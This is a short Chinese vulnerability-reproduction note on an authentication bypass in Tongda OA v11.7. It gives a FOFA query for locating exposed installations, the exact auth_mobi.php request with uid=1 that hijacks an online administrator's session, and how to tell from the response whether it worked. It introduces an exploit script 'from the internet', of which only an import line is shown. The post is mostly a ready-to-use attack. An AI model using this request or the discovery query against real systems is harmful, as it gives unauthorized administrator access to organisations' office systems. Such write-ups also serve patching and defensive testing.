权限
2021-03-15
2021-03-15
# 通达 OA v11.7 在线任意用户登录
# 漏洞描述
需要有在线用户才能登录
# 资产查找
FOFA:
1 | app="TDXK-通达OA" |
# 漏洞复现
首先访问:
1 | http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 |
页面空白则表示用户在线,并且此时已经获取到了 cookie
返回显示 RELOGIN ,则不在线
若在线,则访问成功登录 uid 为 1 的用户,也就是管理员用户
exp 脚本如下(来源网络):
1 | import requests |
管理员用户
其他用户